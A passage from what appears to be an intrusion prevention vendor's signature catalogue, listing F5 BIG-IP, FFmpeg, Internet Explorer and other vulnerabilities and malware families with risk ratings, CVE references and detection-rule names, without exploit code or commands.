First detected in: sgpkg-ips-1552-5242
Last changed: sgpkg-ips-1552-5242
Platform: Unix; Linux
Software: F5 Networks BIG-IP
Type: Input Validation
Description: A vulnerability in F5 Big-IP's iControl which allows remote attackers to execute arbitrary code by injecting a newline into an RPM .rpmspec file.
Situation: HTTP_CS-F5-Big-IP-iControl-Authenticated-RCE-Via-Rpm-Creator
References:
CVE-2022-41800
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41800
Back to top

F5-Big-IP-iControl-CSRF-File-Write-Soap-API

About this vulnerability: A vulnerability in F5 Big-IP's iControl.
Risk: High
First detected in: sgpkg-ips-1552-5242
Last changed: sgpkg-ips-1552-5242
Platform: Unix; Linux
Software: F5 Networks BIG-IP
Type: Input Validation
Description: A vulnerability in F5 Big-IP's iControl interface which allows remote attackers to write arbitrary files to the file system by enticing an authenticated administrator to visit a malicious url which redirects them to the target.
Situation: File-Text_F5-Big-IP-iControl-CSRF-File-Write-Soap-API
References:
CVE-2022-41622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41622
Back to top

F5-Big-IP-Next-Central-Manager-Login-SQL-Injection-CVE-2024-26026

About this vulnerability: A vulnerability in F5 Networks BIG-IP Next Central Manager
Risk: Critical
First detected in: sgpkg-ips-1740-5242
Last changed: sgpkg-ips-1740-5242
Platform: Generic
Software: F5 Networks BIG-IP Next Central Manager
Type: Input Validation
Description: An SQL injection vulnerability has been reported in F5 BIG-IP Next Central Manager. The vulnerability is due to mishandling of user input in the API login functionality. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary SQL command execution.
Situation: File-Text_F5-Big-IP-Next-Central-Manager-Login-SQL-Injection-CVE-2024-26026
References:
CVE-2024-26026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-26026
Back to top

F5-Big-IP-Next-Central-Manager-Validateuserincm-OData-Injection

About this vulnerability: A vulnerability in F5 Networks BIG-IP Next Central Manager
Risk: Moderate
First detected in: sgpkg-ips-1730-5242
Last changed: sgpkg-ips-1730-5242
Platform: Generic
Software: F5 Networks BIG-IP Next Central Manager
Type: Input Validation
Description: Mishandling of user input in the validateUserInCM() function causes a data injection vulnerability in F5 Big-IP Central Manager. A successful exploitation can allow an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-F5-Big-IP-Next-Central-Manager-Validateuserincm-OData-Injection
References:
CVE-2024-21793
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21793
Back to top

F5-Big-IP-TMM-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in F5 Big IP
Risk: High
First detected in: sgpkg-ips-1330-5242
Last changed: sgpkg-ips-1330-5242
Platform: Generic
Software: F5 Networks BIG-IP
Type: Malfunction
Description: There exists an out-of-bounds vulnerability in Traffic Management Microkernels of F5 Big IP. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_Server-Header-Name-Too-Long
References:
CVE-2021-22992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22992
Back to top

F5-iControl-Rest-Unauthenticated-RCE-CVE-2021-22986

About this vulnerability: A vulnerability in F5 BIG-IP
Risk: High
First detected in: sgpkg-ips-1331-5242
Last changed: sgpkg-ips-1332-5242
Platform: Generic
Software: F5 Networks BIG-IP
Type: Malfunction
Description: There exists a unauthenticated remote code execution vulnerability in iControl REST interface of F5 Networks BIG-IP. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-F5-iControl-Rest-Unauthenticated-RCE-CVE-2021-22986
HTTP_CSH-F5-iControl-Rest-Unauthenticated-RCE-CVE-2021-22986
References:
CVE-2021-22986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22986
Back to top

F5-iControl-Rest-Unauthenticated-RCE-CVE-2022-1388

About this vulnerability: A vulnerability in F5 BIG-IP
Risk: High
First detected in: sgpkg-ips-1463-5242
Last changed: sgpkg-ips-1463-5242
Platform: Generic
Software: F5 Networks BIG-IP
Type: Malfunction
Description: There exists a unauthenticated remote code execution vulnerability in iControl REST interface of F5 Networks BIG-IP. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-F5-iControl-Rest-Unauthenticated-RCE-CVE-2022-1388
References:
CVE-2022-1388
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
Back to top

F5-Multiple-Products-iControl-API-Hostname-Remote-Command-Execution

About this vulnerability: A vulnerability in F5 Networks BIG-IP
Risk: High
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: F5 Networks BIG-IP; F5 Networks BIG-IP Edge Gateway; F5 Networks BIG-IP Link Controller; F5 Networks BIG-IP WebAccelerator; F5 Networks BIG-IQ Cloud; F5 Networks BIG-IQ Device; F5 Networks BIG-IQ Security; F5 Networks Enterprise Manager
Type: Input Validation
Description: A remote command execution vulnerability exists in the iControl API in multiple F5 products. The vulnerability is due to insufficient validation of the hostname element in incoming SOAP requests. A remote, authenticated attacker can exploit this vulnerability by sending malicious SOAP requests to the server. Successful exploitation will result in arbitrary command execution with ROOT privileges.
Situation: HTTP_CS-F5-Multiple-Products-iControl-API-Hostname-Remote-Command-Execution
HTTPS_CS-F5-Multiple-Products-iControl-API-Hostname-Remote-Command-Execution
References:
CVE-2014-2928
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2928
BID-67278
http://www.securityfocus.com/bid/67278
OSVDB-106728
http://www.osvdb.org/106728
Back to top

F5-Networks-Big-IP-iControl-Privilege-Escalation

About this vulnerability: An F5 Networks Big-IP iControl Privilege Escalation vulnerability.
Risk: High
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: F5 Networks BIG-IP
Type: Insecure Configuration
Description: A vulnerability in F5 Networks BIG-IP, versions 11.3.0 - 11.6.0, which allows remote attackers to gain privileges via an iCall script or handler in a SOAP request to iControl/iControlPortal.cgi.
Situation: HTTP_CRL-F5-Networks-Big-IP-iControl-Privilege-Escalation
References:
CVE-2015-3628
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3628
Back to top

F5-Networks-Big-IP-TMUI-Directory-Traversal-CVE-2020-5902

About this vulnerability: An attempt to exploit an F5 Networks Big-IP TMUI Directory Traversal vulnerability detected
Risk: High
First detected in: sgpkg-ips-1261-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: F5 Networks BIG-IP
Type: Directory Traversal
Description: Improper handling of user-supplied path in HTTP requests causes a directory traversal vulnerability in multiple F5 BIG-IP products. A successful exploit allows arbitrary file read, write and remote code execution in ROOT security context.
Situation: HTTP_CRL-F5-Networks-Big-IP-TMUI-Directory-Traversal-CVE-2020-5902
References:
CVE-2020-5902
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5902
Back to top

F5-Request-Smuggling-CVE-2023-46747

About this vulnerability: An attempt to exploit a vulnerability in F5 Networks BIG-IP detected
Risk: High
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1650-5242
Platform: Generic
Software: F5 Networks BIG-IP
Type: Input Validation
Description: F5 systems with the Traffic Management User Interface (TMUI) exposed are vulnerable to an authentication bypass issue that can lead to a complete compromise. The bypass is related HTTP request smuggling, and it is closely related to CVE-2022-26377.
Situation: HTTP_CSH-F5-Request-Smuggling-CVE-2023-46747
References:
CVE-2023-46747
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46747
Back to top

Facebook-Fizz-Early-Data-Integer-Overflow-DoS

About this vulnerability: A vulnerability in Facebook Fizz
Risk: High
First detected in: sgpkg-ips-1150-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Facebook Fizz
Type: Integer Overflow
Description: A vulnerability in Facebook Fizz, versions prior to v2019.02.25.00, which allows remote attackers to cause a denial of service condition by sending a crafted request and early data to the target server, due to an integer overflow in the handling of TLS 1.3 early data requests.
Situation: TLS_CS-Facebook-Fizz-Early-Data-Integer-Overflow-DoS
References:
CVE-2019-3560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3560
Back to top

Facebook-Photo-Uploader-ActiveX-Control-Buffer-Overflow

About this vulnerability: A Facebook Photo Uploader ActiveX Control Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Facebook Photo Uploader
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Facebook Photo Uploader ActiveX control, versions 5.0.14.0 and before, which allows remote attackers to execute arbitrary code via a long FileMask property value.
Situation: File-Text_Microsoft-Killbit-Disabled-ActiveX-Object
References:
CVE-2008-5711
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5711
BID-27534
http://www.securityfocus.com/bid/27534
OSVDB-41073
http://www.osvdb.org/41073
Back to top

FakeAV-Botnet

About this vulnerability: FakeAV botnet
Risk: High
First detected in: sgpkg-ips-364-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: FakeAV is a trojan horse program. Hosts compromised by this trojan form a remote controllable botnet.
Situation: HTTP_CRL-Trojan-FakeAV-File-Download
HTTP_CRL-Trojan-FakeAV-Checkin
Back to top

Fakerean-Botnet

About this vulnerability: Fakerean botnet
Risk: High
First detected in: sgpkg-ips-556-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: FakeRean is a malicious botnet. Infected computers exhibit the presence of a fake antivirus software with varying product names. The monetization scheme of fake antivirus software is to spoof a user interface that resembles the interface of a legitimate antivirus product and to present arbitrary infection indicators. However, in order to disinfect, the user is asked to buy a license. While the affected computer is indeed infected, the intention of the fake antivirus is typically not to disinfect the computer. It is recommended not to buy any kind of license of the fake antivirus program. Instead, users are advised to disinfect computers with antivirus solutions of trusted origin.
Situation: Generic_SS-Vobfus-Botnet-Request
HTTP_CSU-Fakerean-Botnet-Request
Back to top

Falcon-One-Error-Page-Remote-File-Inclusion

About this vulnerability: File inclusion vulnerbilities in Falcon One CMS
Risk: High
First detected in: sgpkg-ips-202-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Falcon One CMS
Type: Input Validation
Description: There is a file inclusion vulnerability in Falcon One CMS. The script does not validate input for various parameters, allowing remote file inclusion and execution of PHP script code in the context of the web server.
Situation: HTTP_CRL-Falcon-One-Error-Page-Remote-File-Inclusion
References:
CVE-2007-6488
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6488
OSVDB-40986
http://www.osvdb.org/40986
Back to top

Fallout-Exploit-Kit-Landing-Page

About this vulnerability: Fallout Exploit Kit landing page was detected
Risk: High
First detected in: sgpkg-ips-1102-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: A page was accessed that resembles the Fallout Exploit Kit landing page. Fallout EK is an exploit kit that has been known to target mainly Japanese web sites.
Situation: File-Text_Fallout-Exploit-Kit-Landing-Page
Back to top

Famatech-Radmin-Usage

About this vulnerability: Famatech Radmin usage
Risk: Low
First detected in: sgpkg-ips-275-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Famatech Radmin
Type: Remote Control
Description: Famatech Radmin is a remote control application. It allows sharing of desktop connections, files, and private networks across machines. Use of this kind of application may be considered a security risk in controlled environments.
Situation: Generic_CS-Famatech-Radmin-Client-Connection-Attempt
Back to top

Family-Connections-CMS-Remote-Command-Execution

About this vulnerability: A Family Connections CMS Remote Command Execution vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Family Connection CMS
Type: Buffer Overflow
Description: A vulnerability in Family Connections CMS, versions 2.5.0 through 2.7.1, which allows remote attackers to execute arbitrary commands via shell metacharacters in the argv[1] parameter.
Situation: HTTP_CSU_Family-Connections-CMS-Remote-Command-Execution
References:
CVE-2011-5130
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5130
OSVDB-77492
http://www.osvdb.org/77492
Back to top

Fancy-Product-Designer-Unauthenticated-SQL-Injection

About this vulnerability: An attempt to exploit a vulnerability in Fancy Product Designer detected
Risk: High
First detected in: sgpkg-ips-1829-5242
Last changed: sgpkg-ips-1829-5242
Platform: Generic
Software: WordPress
Type: Malfunction
Description: An attempt to exploit a vulnerability in Fancy Product Designer detected.
Situation: HTTP_CRL-Fancy-Product-Designer-Plugin-For-Wordpress-Unauthenticated-SQL-Injection
References:
CVE-2024-51818
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-51818
Back to top

FANUC-OlpcPRO-Directory-Traversal

About this vulnerability: FANUC OlpcPRO Directory Traversal Vulnerability 0-day
Risk: High
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: FANUC
Type: Directory Traversal
Description: A vulnerability in FANUC OlpcPRO allowing remote attackers to view arbitrary files through directory traversal.
Situation: HTTP_CSU-FANUC-OlpcPRO-Directory-Traversal
Back to top

Fastify-Contenttypeparser-Denial-Of-Service

About this vulnerability: A vulnerability in Fastify
Risk: Moderate
First detected in: sgpkg-ips-1518-5242
Last changed: sgpkg-ips-1518-5242
Platform: Generic
Software: Fastify
Type: Input Validation
Description: Improper validation of the content-type HTTP header in user requests causes a vulnerability in Fastify. A successful exploit can cause a denial of service condition on the target service.
Situation: HTTP_CSH-Fastify-Contenttypeparser-Denial-Of-Service
References:
CVE-2022-39288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39288
Back to top

FastTrack-Peer-To-Peer-Network-Usage

About this vulnerability: FastTrack Peer-to-Peer Network usage
Risk: Moderate
First detected in: sgpkg-ips-12-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FastTrack
Type: Peer-to-Peer
Description: FastTrack is a peer-to-peer network that can be used to share files. File sharing can expose to security risks if unintentionally sharing confidential files or downloading files that contain malicious content such as viruses, worms, or backdoors.
Situation: P2P-TCP_FastTrack-Give
P2P-TCP_FastTrack-Get
Back to top

Fatal-RAT-Infection-Traffic

About this vulnerability: Fatal RAT infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1380-5242
Last changed: sgpkg-ips-1380-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Fatal RAT infection traffic was detected.
Situation: Generic_TCP-Fatal-RAT-Infection-Traffic
Back to top

Fatek-Automation-PLC-Winproladder-Spf-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Fatek Automation PLC WinProladder
Risk: Moderate
First detected in: sgpkg-ips-1304-5242
Last changed: sgpkg-ips-1304-5242
Platform: Generic
Software: Fatek Automation PLC WinProladder
Type: Buffer Overflow
Description: Improper validation of data lengths causes a stack buffer overflow in Fatek Automation PLC WinProladder. A successful exploit allows an attacker to execute arbitrary code with the privileges of the affected program.
Situation: File-Binary_Fatek-Automation-PLC-Winproladder-Spf-Stack-Buffer-Overflow
References:
CVE-2020-16234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16234
Back to top

Fatek-Automation-PLC-Winproladder-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Fatek Automation PLC WinProladder
Risk: Moderate
First detected in: sgpkg-ips-852-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Fatek Automation PLC WinProladder
Type: Buffer Overflow
Description: Improper file validation results in a stack buffer overflow vulnerability in Fatek Automation PLC WinProladder. A successful exploitation can allow an attacker to run arbitrary code with the privileges of the daemon, or create a denial of service condition.
Situation: File-Binary_Fatek-Automation-PLC-Winproladder-Stack-Buffer-Overflow
References:
CVE-2016-8377
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8377
Back to top

Fatek-Automation-PLC-Winproladder-Tab-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Fatek Automation PLC WinProladder
Risk: High
First detected in: sgpkg-ips-1329-5242
Last changed: sgpkg-ips-1451-5242
Platform: Generic
Software: Fatek Automation PLC WinProladder
Type: Buffer Overflow
Description: A stack-based buffer overflows exists in Fatek Automation PLC WinProladder. The vulnerability is due to improper validation of user supplied data before copying to a fixed-length stack buffer. A remote attacker could exploit this vulnerability by enticing a target user into opening a crafted .tab file. Successful exploitation could result in arbitrary code execution in the context of the user running the application.
Situation: File-Binary_Fatek-Automation-PLC-Winproladder-Tab-Stack-Buffer-Overflow
References:
CVE-2020-16234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16234
Back to top

FBCIndex-Access

About this vulnerability: FBCIndex
Risk: Moderate
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-1296-5242
Platform: Mac OS X
Software: <os>
Type: Insecure Configuration
Description: A remote attacker can read the indexed contents of files by submitting a URL to the vulnerable host's Web service in the following format: http://www.example.com/target_directory/.FBCIndex. This information could provide an attacker with sensitive information, including potential passwords useful in dictionary attacks, system configuration settings, installed applications, etc. If this vulnerability is properly exploited, the information gathered by the attacker could be used to further compromise the security of the host.
Situation: HTTP_CRL-FBCIndex-Access
Back to top

Felismus-Malware

About this vulnerability: Felismus Malware
Risk: High
First detected in: sgpkg-ips-1020-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Remote Control
Description: Felismus Malware is a modular and self-updating malware.
Situation: HTTP_CSH-Felismus-Malware-Request
Back to top

FFmpeg-4xm-Processing-Memory-Corruption

About this vulnerability: A vulnerability in FFmpeg Project Team FFmpeg
Risk: Moderate
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FFmpeg Project Team FFmpeg; VideoLAN VLC
Type: Malfunction
Description: There is a vulnerability in the FFmpeg audio/video converter. This vulnerability is due to lack of boundary checks on a user supplied value in processing of 4XM movie files. An unauthenticated remote attacker could exploit this vulnerability by enticing a user to play a specially crafted 4XM movie file. Successful exploitation would cause memory corruption which may allow the attacker to execute arbitrary code with the privileges of the currently logged on user. In an attack case where code injection is not successful, the application will terminate unexpectedly. In a more sophisticated attack scenario where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code.
Situation: File-RIFF_FFmpeg-4xm-Processing-Memory-Corruption
References:
CVE-2009-0385
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0385
BID-33502
http://www.securityfocus.com/bid/33502
OSVDB-51643
http://www.osvdb.org/51643
Back to top

FFmpeg-CBS_JPEG_Split_Fragment-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in FFmpeg
Risk: Moderate
First detected in: sgpkg-ips-1263-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FFmpeg Project Team FFmpeg
Type: Buffer Overflow
Description: A missing length check in the function cbs_jpeg_split_fragment() in libavcodec/cbs_jpeg.c causes a vulnerability in FFmpeg. A successful exploit may allow an attacker to execute arbitrary code with the privileges of the target process.
Situation: File-JPEG_FFmpeg-CBS_JPEG_Split_Fragment-Heap-Buffer-Overflow
File-Binary_FFmpeg-CBS_JPEG_Split_Fragment-Heap-Buffer-Overflow
References:
CVE-2020-12284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12284
Back to top

FFmpeg-Mov_Read_Keys-Integer-Overflow

About this vulnerability: A vulnerability in FFmpeg Project Team FFmpeg
Risk: Moderate
First detected in: sgpkg-ips-825-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FFmpeg Project Team FFmpeg
Type: Integer Overflow
Description: Improper handling of file metadata causes an integer overflow in the mov_read_keys() function in ffmpeg. A successful exploitation allowsa an attacker to run arbitrary code on the target system.
Situation: File-MPEG_FFmpeg-Mov_Read_Keys-Integer-Overflow
References:
CVE-2016-5199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5199
Back to top

FFmpeg-OGV-File-Format-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in FFmpeg
Risk: Moderate
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: FFmpeg Project Team FFmpeg
Type: Malfunction
Description: There is a memory corruption vulnerability in FFmpeg. FFmpeg is used by many projects, including VLC media player, MPlayer, Handbrake, Blender, and Google Chrome. A remote attacker can exploit this vulnerability by enticing a target user to open a malicious ogv file, potentially causing arbitrary code to be injected and executed in the security context of the current user.
Situation: E-Mail_BS-FFmpeg-OGV-File-Format-Memory-Corruption
HTTP_SS-FFmpeg-OGV-File-Format-Memory-Corruption
File-Binary_FFmpeg-OGV-File-Format-Memory-Corruption
References:
BID-36465
http://www.securityfocus.com/bid/36465
Back to top

FFmpeg-Vmd_Read_Header-Integer-Overflow

About this vulnerability: A vulnerability in FFmpeg Project Team FFmpeg
Risk: Moderate
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: FFmpeg Project Team FFmpeg; VideoLAN VLC
Type: Integer Overflow
Description: A vulnerability has been reported in FFmpeg that could allow remote attackers to compromise a vulnerable target.
Situation: HTTP_SS-FFmpeg-Vmd_Read_Header-Integer-Overflow
File-Binary_FFmpeg-Vmd_Read_Header-Integer-Overflow
References:
BID-36419
http://www.securityfocus.com/bid/36419
Back to top

Ficker-Stealer-Infection-Traffic

About this vulnerability: Ficker stealer infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1352-5242
Last changed: sgpkg-ips-1352-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Ficker stealer infection traffic was detected.
Situation: Generic_TCP-Ficker-Stealer-Infection-Traffic
Back to top

File-Binary_Adobe-Acrobat-EMF-EMR_alphablend-CVE-2018-12789-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Adobe Systems Acrobat 2017
Risk: Moderate
First detected in: sgpkg-ips-1093-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Adobe Acrobat
Type: Malfunction
Description: Improper parsing of an EMR_ALPHABLEND record in an EMF file causes an out of bounds read vulnerability in Adobe Acrobat. A successful exploit may allow an attacker to access sensitive information.
Situation: File-Binary_Adobe-Acrobat-EMF-EMR_alphablend-CVE-2018-12789-Out-Of-Bounds-Read
References:
CVE-2018-12789
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12789
Back to top

File-Flash_Adobe-Flash-copyPixels-Integer-Overflow

About this vulnerability: A vulnerability in Adobe Flash Player
Risk: High
First detected in: sgpkg-ips-1329-5242
Last changed: sgpkg-ips-1329-5242
Platform: Generic
Software: Adobe Flash Player; Adobe Systems AIR
Type: Integer Overflow
Description: There exists an integer overflow vulnerability in Adobe Flash. A remote attacker can exploit this vulnerability by enticing a target user to open a crafted file. Successful exploitation could result in the execution of arbitrary code in the security context of the target user.
Situation: File-Flash_Adobe-Flash-copyPixels-Integer-Overflow
References:
CVE-2016-1010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1010
Back to top

File-Flash_SecureSWF-Obfuscation

About this vulnerability: A suspicious Flash file detected
Risk: Moderate
First detected in: sgpkg-ips-1051-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: A suspicious Flash file has been detected that uses the commercial SecureSWF obfuscator from http://www.kindi.com. This obfuscator is used by exploit kits to obfuscate Flash exploits.
Situation: File-Flash_SecureSWF-Obfuscation
Back to top

File-Replication-Pro-execCommand-Command-Execution

About this vulnerability: A vulnerability in File Replication Pro
Risk: High
First detected in: sgpkg-ips-741-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: File Replication Pro
Type: Input Validation
Description: There exists a command execution vulnerability in File Replication Pro.
Situation: Generic_CS-File-Replication-Pro-execCommand-Command-Execution
Back to top

File-Sharing-Wizard-POST-SEH-Buffer-Overflow

About this vulnerability: A vulnerability in File Sharing Wizard
Risk: High
First detected in: sgpkg-ips-1199-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: File Sharing Wizard
Type: Buffer Overflow
Description: A vulnerability in File Sharing Wizard 1.5.0 which allows remote attackers to execute arbitrary code through an SEH based buffer overflow in an HTTP POST parameter.
Situation: HTTP_CS-File-Sharing-Wizard-POST-SEH-Buffer-Overflow
References:
CVE-2019-16724
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16724
Back to top

File-Text_Document-Template-Injection

About this vulnerability: A possibly malicious Word document file with references to external template detected
Risk: Moderate
First detected in: sgpkg-ips-1038-5242
Last changed: sgpkg-ips-1474-5242
Platform: Windows
Software: Microsoft Word
Type: Insecure Configuration
Description: Microsoft Office Word has a feature, which allows downloading templates from external sources. These templates can be used to execute malicious activities. Also in addition, user's credentials can be harvested when an external template is requested.
Situation: File-Text_Document-Template-Injection
File-TextId_Document-Template-Injection
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3873

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 10.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3873
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3873-2
References:
CVE-2013-3873
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3873
MS13-080
http://technet.microsoft.com/security/bulletin/MS13-080
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3874

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3874
References:
CVE-2013-3874
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3874
MS13-080
http://technet.microsoft.com/security/bulletin/MS13-080
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3875

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 8.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3875
References:
CVE-2013-3875
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3875
MS13-080
http://technet.microsoft.com/security/bulletin/MS13-080
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3885

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 10.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3885
References:
CVE-2013-3885
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3885
MS13-080
http://technet.microsoft.com/security/bulletin/MS13-080
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3893

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-543-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3893
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3893-2
References:
CVE-2013-3893
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3893
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3914

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-550-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3914
References:
CVE-2013-3914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3914
MS13-088
http://technet.microsoft.com/security/bulletin/MS13-088
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3916

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-550-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3916
References:
CVE-2013-3916
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3916
MS13-088
http://technet.microsoft.com/security/bulletin/MS13-088
Back to top

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3917

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-550-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3917
